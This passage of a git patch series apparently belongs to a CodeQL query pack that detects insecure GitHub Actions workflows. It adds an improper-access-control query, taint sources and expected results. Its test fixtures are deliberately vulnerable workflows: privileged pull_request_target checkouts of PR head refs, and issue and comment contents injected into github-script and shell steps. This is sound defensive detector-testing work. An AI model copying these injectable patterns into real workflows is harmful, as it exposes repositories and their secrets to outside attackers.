ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected create mode 100644 ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql new file mode 100644 index 000000000000..88ac3cee04db --- /dev/null +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -0,0 +1,30 @@ +/** + * @name Improper Access Control + * @description The access control mechanism is not properly implemented, allowing untrusted code to be executed in a privileged context. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/improper-access-control + * @tags actions + * security + * external/cwe/cwe-285 + */ + +import codeql.actions.security.UntrustedCheckoutQuery + +from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event +where + job = checkout.getEnclosingJob() and + job.isPrivileged() and + job.getATriggerEvent() = event and + event.getName() = "pull_request_target" and + event.getAnActivityType() = "synchronize" and + job.getAStep() = checkout and + ( + checkout.getIf() = check + or + checkout.getEnclosingJob().getIf() = check + ) +select checkout, "The checked-out code can be changed after the authorization check o step $@.", + check, check.toString() diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml new file mode 100644 index 000000000000..48833460b44b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml @@ -0,0 +1,20 @@ +name: Pull request feedback + +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml new file mode 100644 index 000000000000..be6a6cf39395 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml @@ -0,0 +1,20 @@ +name: Pull request feedback + +on: + pull_request_target: + types: [ labeled ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected new file mode 100644 index 000000000000..53dd12b9fb6e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected @@ -0,0 +1 @@ +| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref new file mode 100644 index 000000000000..09a19f21e3cb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref @@ -0,0 +1,2 @@ +Security/CWE-285/ImproperAccessControl.ql + From 00f77ca9ecda1661a11a6fb3b3ed005549809445 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 11:36:43 +0200 Subject: [PATCH 272/707] Add missing source for peter-murray/issue-body-parser-action --- ...-murray_issue-body-parser-action.model.yml | 6 ++ .../CWE-094/.github/workflows/test3.yml | 61 +++++++++++++++++++ 2 files changed, 67 insertions(+) create mode 100644 ql/lib/ext/peter-murray_issue-body-parser-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml new file mode 100644 index 000000000000..d156d7da6581 --- /dev/null +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml new file mode 100644 index 000000000000..40fe86529b0e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml @@ -0,0 +1,61 @@ +name: Approve or Deny Marketplace Action Request + +on: + issue_comment: + types: [created] + +jobs: + parse-issue: + runs-on: self-hosted + outputs: + payload: ${{ steps.issue_body_parser_request.outputs.payload }} + steps: + - name: Get JSON Data out of Issue Request + uses: peter-murray/issue-body-parser-action@v2 + id: issue_body_parser_request + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + issue_id: ${{ github.event.issue.number }} + payload_marker: request + fail_on_missing: false + approve-or-deny-request: + runs-on: self-hosted + needs: parse-issue + if: needs.parse-issue.outputs.payload != 'NOT_FOUND' + steps: + - name: Lookup the latest release of ${{ fromJson(needs.parse-issue.outputs.payload).owner }}/${{ fromJson(needs.parse-issue.outputs.payload).repo }} + id: get_version + env: + OWNER: ${{ fromJson(needs.parse-issue.outputs.payload).owner }} + REPO: ${{ fromJson(needs.parse-issue.outputs.payload).repo }} + REQUEST_VERSION: ${{ fromJson(needs.parse-issue.outputs.payload).version }} + run: | + if [ $REQUEST_VERSION == 'latest' ]; then + echo "Finding latest release of $OWNER/$REPO..." + export VERSION=`curl https://api.github.com/repos/$OWNER/$REPO/releases/latest | jq -r .name` + else + export VERSION=$REQUEST_VERSION + fi + echo "VERSION: $VERSION" + echo "version=$VERSION" >> $GITHUB_OUTPUT + - name: Check out scripts + uses: actions/checkout@v3 + - name: Setup Node + uses: actions/setup-node@v3 + with: + node-version: '14' + check-latest: true + - name: Install dependencies + run: | + cd .github/scripts + npm install + - name: Approve or deny request + uses: actions/github-script@main + env: + VERSION: ${{ steps.get_version.outputs.version }} + with: + debug: true + script: | + const options = { token: '${{ secrets.TOKEN }}', adminOpsOrg: '${{ vars.ADMIN_OPS_ORG }}', actionsApprovedOrg: '${{ vars.ACTIONS_APPROVED_ORG }}', actionsApproverTeam: '${{ vars.ACTIONS_APPROVERS_TEAM }}', baseUrl: '${{ github.api_url }}', version: process.env.VERSION }; + const payload = ${{ needs.parse-issue.outputs.payload }} + await require('./.github/scripts/approve-or-deny-request.js')({github, context, payload, options}); From 0473c3824f46c74b04dbf80ac762751a9c83f090 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 11:38:39 +0200 Subject: [PATCH 273/707] Treat branch-deploy action as a source of HEAD ref for untrusted checkouts --- .../actions/security/UntrustedCheckoutQuery.qll | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 10a45830324e..421af3be8abb 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -92,9 +92,15 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt or // 3rd party actions returning the PR head sha/ref exists(UsesStep step | - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and - // TODO: This should be read step of the head_sha or head_ref output vars - this.getArgument("ref").regexpMatch(".*head_ref.*") and + ( + step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + // TODO: This should be read step of the head_sha or head_ref output vars + this.getArgument("ref").matches("%.head_ref%") + or + step.getCallee() = ["github/branch-deploy"] and + // TODO: This should be read step of the ref output var + this.getArgument("ref").matches("%.ref%") + ) and DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) ) or From a0939bb0a3dfc8fbbccd7c055ac2715fabede49c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:29:45 +0200 Subject: [PATCH 274/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e68a4c67cc4f..acfc1c7e2102 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.22 +version: 0.0.23 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 465be503e7c3..efafbbb55bac 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.22 +version: 0.0.23 groups: - actions - queries From ca59423c8a47ba15afebfa5213a9566bdf962de3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:32:40 +0200 Subject: [PATCH 275/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index acfc1c7e2102..54748d6fd623 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.23 +version: 0.0.24 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index efafbbb55bac..1b8d7e64028c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.23 +version: 0.0.24 groups: - actions - queries From f96b9cc5356f5ffd29b7f94fb54fd59df2aafe93 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:35:13 +0200 Subject: [PATCH 276/707] Update tests --- ql/test/library-tests/test.expected | 1 + .../query-tests/Security/CWE-094/CodeInjection.expected | 7 +++++++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 8 ++++++++ 3 files changed, 16 insertions(+) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 61f7120e78e9..20db431fc24e 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -464,6 +464,7 @@ sources | jitterbit/get-changed-files | * | output.renamed | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | | marocchino/on_artifact | * | output.* | artifact | manual | +| peter-murray/issue-body-parser-action | * | output.* | text | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 9e479f9eaf49..cc716c47e698 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -59,6 +59,9 @@ edges | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -222,6 +225,10 @@ nodes | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 738270e3ccd8..87658e4149eb 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -59,6 +59,9 @@ edges | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -222,6 +225,10 @@ nodes | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -333,6 +340,7 @@ subpaths | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From 30d0b9d1333120d31fc4a378b5f8c38428fac760 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 22:07:49 +0200 Subject: [PATCH 277/707] Add context paths containing tainted fields --- .../codeql/actions/dataflow/FlowSources.qll | 30 ++++++++----------- 1 file changed, 13 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9e4c258e39ab..08717c337875 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -76,22 +76,6 @@ private predicate textEvent(string context) { ) } -// bindingset[context] -// private predicate repoNameEvent(string context) { -// exists(string reg | -// reg = -// [ -// // repo name -// // Owner: All characters must be either a hyphen (-) or alphanumeric -// // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point -// "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name -// "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name -// "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo -// ] -// | -// Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) -// ) -// } bindingset[context] private predicate branchEvent(string context) { exists(string reg | @@ -194,7 +178,19 @@ private predicate jsonEvent(string context) { reg = [ // json - "github\\.event", + "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", + "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", + "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", + "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", + "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", + "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.head_commit", + "github\\.event\\.workflow_run\\.head_commit\\.author", + "github\\.event\\.workflow_run\\.head_commit\\.committer", + "github\\.event\\.workflow_run\\.head_repository", + "github\\.event\\.workflow_run\\.pull_requests", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) From 7a66b12437ec1870d915e2fd421131119fdbcacb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 22:33:50 +0200 Subject: [PATCH 278/707] add tests --- .../CWE-094/.github/workflows/test4.yml | 19 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 2 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 3 files changed, 25 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml new file mode 100644 index 000000000000..c4380bfa8afa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml @@ -0,0 +1,19 @@ +name: Test +on: + issue_comment: + types: [created, edited] + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Dump GitHub comment context + id: github_comment_step + run: echo '${{ toJSON(github.event.comment) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event.issue) }}' diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index cc716c47e698..34e173a055b5 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 87658e4149eb..4b2704043737 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -341,6 +343,8 @@ subpaths | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From 6e8fc89034f9214461714c6401c277be95565483 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 09:29:24 +0000 Subject: [PATCH 279/707] Add default branch name check --- ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 10 ++++++++-- .../dataflow/internal/ExternalFlowExtensions.qll | 6 +++++- .../actions/security/CachePoisoningQuery.qll | 15 ++++++++------- ql/lib/ext/workflow-models/workflow-models.yml | 6 ++++++ ql/test/library-tests/workflowenum.ql | 6 +++--- 5 files changed, 30 insertions(+), 13 deletions(-) diff --git 